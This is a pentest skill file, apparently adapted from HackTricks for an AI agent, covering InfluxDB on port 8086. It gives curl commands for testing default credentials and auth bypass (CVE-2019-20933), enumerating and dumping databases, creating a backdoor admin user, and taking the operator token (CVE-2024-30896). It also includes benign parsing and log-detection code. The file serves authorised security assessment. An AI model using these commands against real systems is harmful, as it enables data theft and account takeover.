Hacktricks-skills influxdb-pentest

Pentest InfluxDB time-series databases on port 8086. Use this skill whenever you need to enumerate, test authentication, or extract data from InfluxDB instances. Trigger for any InfluxDB assessment, time-series database testing, port 8086 enumeration, or when you discover an InfluxDB service during reconnaissance. This skill covers both v1.x (InfluxQL) and v2.x (Flux API) versions.

Install

Clone the upstream repo:
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/network-services-pentesting/8086-pentesting-influxdb/SKILL.MD

Source content

InfluxDB Pentesting Skill

A comprehensive guide for testing InfluxDB time-series databases during security assessments.

Quick Start

When you encounter an InfluxDB instance (port 8086), follow this workflow:

  1. Identify version - Determine if it's v1.x or v2.x
  2. Test authentication - Check if auth is required or bypassed
  3. Enumerate - List databases, measurements, and users
  4. Extract data - Dump sensitive information if accessible
  5. Check for vulnerabilities - Test for known CVEs

Step 1: Version Identification

Determine the InfluxDB version to know which API to use.

v1.x Detection

# Banner grab - returns 204 with version headers
curl -i http://<host>:8086/ping

Look for the X-Influxdb-Version and X-Influxdb-Build headers.

v2.x Detection

# Health check - returns JSON with version
curl -s http://<host>:8086/health | jq .

This works without authentication on most deployments.

Check for Metrics Endpoint

Exposed instances often serve Prometheus-style metrics:

curl -s http://<host>:8086/metrics | head -20

Step 2: Authentication Testing

Test Unauthenticated Access (v1)

# Try connecting without credentials
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES"

If this returns database names, authentication is disabled.

Test with Default Credentials

# Common default credentials
curl -sG "http://<host>:8086/query" \
  --data-urlencode "u=influx" \
  --data-urlencode "p=influx" \
  --data-urlencode "q=SHOW DATABASES"

Test CVE-2019-20933 (Auth Bypass)

This vulnerability allowed authentication bypass in certain versions:

# Test the bypass - if successful, you can query without valid auth
curl -sG "http://<host>:8086/query" \
  --data-urlencode "u=influx" \
  --data-urlencode "p=influx" \
  --data-urlencode "q=SHOW DATABASES"

This request is the same as the default-credential check above, so attribute a success to the bypass only when the credentials supplied are ones the server should reject; if results still come back, the bypass may be present.

Step 3: Enumeration (v1.x - InfluxQL)

List Databases

curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES" | jq .

Common databases to look for:

  • telegraf - System metrics
  • _internal - Internal InfluxDB metrics
  • Custom application databases

List Users (if auth disabled)

curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW USERS" | jq .

List Measurements (Tables)

curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SHOW MEASUREMENTS" | jq .

List Field Keys (Columns)

curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SHOW FIELD KEYS" | jq .

List Retention Policies

curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SHOW RETENTION POLICIES" | jq .

Step 4: Data Extraction

Dump Sample Data

curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SELECT * FROM <measurement> LIMIT 10" | jq .

Dump All Data from Measurement

curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SELECT * FROM <measurement>" | jq .

Force Epoch Timestamps

Useful for programmatic processing:

curl -sG "http://<host>:8086/query" \
  --data-urlencode "epoch=ns" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SELECT * FROM <measurement> LIMIT 10" | jq .

Query Specific Fields

curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SELECT usage_idle, usage_user FROM cpu WHERE host='ubuntu'" | jq .
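The /query endpoint answers with a results/series/columns/values JSON structure rather than flat rows. This added example (not part of the original skill) flattens that structure into row dicts, converts epoch=ns timestamps without float rounding, and surfaces statement-level errors so an empty list is never mistaken for "no data"; both sample responses are constructed.

```python
import json
from datetime import datetime, timedelta, timezone

# Divisor that turns an integer timestamp in the given epoch unit into seconds
EPOCH_DIVISOR = {"ns": 10**9, "u": 10**6, "ms": 10**3, "s": 1}

# Constructed sample of what /query?epoch=ns&db=telegraf&q=SELECT ... returns
SAMPLE = json.dumps({"results": [{"statement_id": 0, "series": [{
    "name": "cpu",
    "columns": ["time", "host", "usage_idle"],
    "values": [[1700000000000000000, "ubuntu", 97.5],
               [1700000010000000000, "ubuntu", 96.0]],
}]}]})

# Constructed sample of a statement-level error (wrong db, missing auth, ...)
SAMPLE_ERR = json.dumps(
    {"results": [{"statement_id": 0, "error": "database not found: nope"}]})


def response_error(body):
    """Return the first error string in a /query response, or None.
    Errors can sit at the top level or inside an individual result."""
    doc = json.loads(body) if isinstance(body, str) else body
    if "error" in doc:
        return doc["error"]
    for result in doc.get("results", []):
        if "error" in result:
            return result["error"]
    return None


def epoch_to_datetime(value, epoch):
    """Convert an integer epoch timestamp to a UTC datetime using integer math."""
    secs, rem = divmod(value, EPOCH_DIVISOR[epoch])
    base = datetime.fromtimestamp(secs, tz=timezone.utc)
    return base + timedelta(microseconds=rem * 10**6 // EPOCH_DIVISOR[epoch])


def parse_query_response(body, epoch="ns"):
    """Flatten results[].series[] (columns + values) into a list of row dicts.
    Raises ValueError on an error response instead of returning []."""
    doc = json.loads(body)
    err = response_error(doc)
    if err is not None:
        raise ValueError(err)
    rows = []
    for result in doc.get("results", []):
        for series in result.get("series", []):
            for values in series.get("values", []):
                row = dict(zip(series["columns"], values))
                row["_measurement"] = series["name"]
                if isinstance(row.get("time"), int):
                    row["time"] = epoch_to_datetime(row["time"], epoch)
                rows.append(row)
    return rows
```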

Step 5: Privilege Escalation (if auth disabled)

Create Admin User

curl -sG "http://<host>:8086/query" \
  --data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES"

Grant Privileges to Existing User

curl -sG "http://<host>:8086/query" \
  --data-urlencode "q=GRANT ALL PRIVILEGES ON <database_name> TO <username>"
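A defender-side counterpart to Steps 2 through 5, added here and not part of the original skill: it parses InfluxDB 1.x "[httpd]" access log lines (the field layout is assumed, and the sample lines are constructed to mirror the requests in this guide) and flags successful unauthenticated /query or /write calls as well as any InfluxQL user or privilege statement.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed layout of an InfluxDB 1.x "[httpd]" access log line: client,
# identity, authenticated user ("-" when none), timestamp, request, status.
LOG_RE = re.compile(
    r'\[httpd\] (?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# InfluxQL statements that create, modify or enumerate accounts and privileges
ADMIN_STMT = re.compile(
    r'\b(CREATE USER|DROP USER|SET PASSWORD|GRANT|REVOKE|SHOW USERS)\b', re.I)

# Constructed sample lines, modelled on the requests in this guide
SAMPLE_LOG = """\
[httpd] 10.0.0.5 - - [14/Nov/2023:22:13:20 +0000] "GET /ping HTTP/1.1" 204 0 "-" "curl/8.4.0" a1 210
[httpd] 10.0.0.5 - - [14/Nov/2023:22:13:21 +0000] "GET /query?q=SHOW+DATABASES HTTP/1.1" 200 113 "-" "curl/8.4.0" a2 980
[httpd] 10.0.0.5 - - [14/Nov/2023:22:13:25 +0000] "GET /query?q=CREATE+USER+hacker+WITH+PASSWORD+%27x%27+WITH+ALL+PRIVILEGES HTTP/1.1" 200 33 "-" "curl/8.4.0" a3 1500
[httpd] 10.0.0.9 - telegraf [14/Nov/2023:22:13:30 +0000] "POST /write?db=telegraf HTTP/1.1" 204 0 "-" "Telegraf/1.28.0" a4 3300
[httpd] 10.0.0.5 - admin [14/Nov/2023:22:13:40 +0000] "GET /query?db=_internal&q=SHOW+USERS HTTP/1.1" 200 160 "-" "curl/8.4.0" a5 700
"""


def analyse(log_text):
    """Return findings for two patterns: successful /query or /write calls
    with no authenticated user (auth disabled or bypassed), and any InfluxQL
    user/privilege statement, whoever issued it."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        rec = m.groupdict()
        url = urlsplit(rec["target"])
        stmt = parse_qs(url.query).get("q", [""])[0]  # decodes '+' and %xx
        base = {"client": rec["client"], "user": rec["user"], "path": url.path}
        if (url.path in ("/query", "/write") and rec["user"] == "-"
                and rec["status"].startswith("2")):
            findings.append({**base, "kind": "unauthenticated_access", "statement": stmt})
        if ADMIN_STMT.search(stmt):
            findings.append({**base, "kind": "admin_statement", "statement": stmt})
    return findings
```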

InfluxDB v2.x Enumeration (Token-based)

If you have a token (from logs, configs, or CVE-2024-30896):

Set Up Token Header

# Store the token once and keep the header in a bash array, so the space
# inside "Token <value>" survives expansion (a plain string in $H would be
# split into three arguments and curl would try to fetch "Token" as a URL)
TOKEN="<your_token>"
H=(-H "Authorization: Token $TOKEN")

List Organizations

curl -s "${H[@]}" http://<host>:8086/api/v2/orgs | jq .

List Buckets (Databases)

curl -s "${H[@]}" 'http://<host>:8086/api/v2/buckets?limit=100' | jq .

List Authorizations

ORGID="<org_id>"
curl -s "${H[@]}" "http://<host>:8086/api/v2/authorizations?orgID=$ORGID" | jq .

Query with Flux

# The v2 query endpoint requires the organization (name or ID) as a query parameter
curl -s "${H[@]}" \
  -H 'Accept: application/csv' \
  -H 'Content-Type: application/vnd.flux' \
  -X POST "http://<host>:8086/api/v2/query?orgID=$ORGID" \
  --data 'from(bucket:"<bucket_name>") |> range(start:-1h) |> limit(n:10)'

Known Vulnerabilities

CVE-2024-30896 - Operator Token Exposure (v2.x)

In InfluxDB OSS 2.x through 2.7.11, authenticated users with read access to authorizations in the default organization could retrieve the operator token.

Test:

curl -s -H 'Authorization: Token <user_token>' \
  'http://<host>:8086/api/v2/authorizations?orgID=<default_org_id>' | jq .

Look for entries with type "operator" - the token may be exposed in the response.

Impact: With the operator token, you can:

  • Administer the entire instance
  • Access all data across organizations
  • Create/modify tokens and users

CVE-2019-20933 - Authentication Bypass (v1.x)

Affected versions allowed authentication bypass through crafted requests. Test with invalid credentials - if queries succeed, the bypass works.

Automated Enumeration

Metasploit

msf6 > use auxiliary/scanner/http/influxdb_enum
msf6 > set RHOSTS <target>
msf6 > run

Common Findings

Sensitive Data to Look For

  • System metrics - Hostnames, IP addresses, system info
  • Application data - User activity, transactions, logs
  • Credentials - Sometimes stored in field values
  • Internal network topology - From monitoring data

Typical Database Names

  • telegraf - System monitoring
  • _internal - InfluxDB internal metrics
  • metrics - Generic metrics database
  • app_metrics - Application-specific
  • logs - Log data

Tips

  1. Always test both v1 and v2 APIs - Some v1.8+ servers accept v2-style requests
  2. Check for unauthenticated access first - Many deployments have auth disabled
  3. Look for default credentials - influx/influx is common
  4. Use jq for parsing - Makes JSON output readable
  5. Quote measurement names - Some versions require "measurement" syntax
  6. Check /metrics endpoint - May expose additional information
  7. Test CVE-2024-30896 on v2.x - Operator token exposure is critical

Output Format

When documenting findings, use this structure:

## InfluxDB Assessment Results

### Version
- Detected: v1.7.5 / v2.x.x
- Endpoint: http://<host>:8086

### Authentication
- Status: Disabled / Enabled / Bypassed
- Default credentials: Working / Not working

### Databases Found
- <database_name>: <description>

### Measurements
- <measurement_name>: <field_count> fields

### Data Extracted
- <measurement>: <record_count> records
- Sample: <first few lines>

### Vulnerabilities
- CVE-2019-20933: Exploitable / Not applicable
- CVE-2024-30896: Exploitable / Not applicable

### Recommendations
- Enable authentication
- Update to latest version
- Remove default credentials
- Restrict network access

References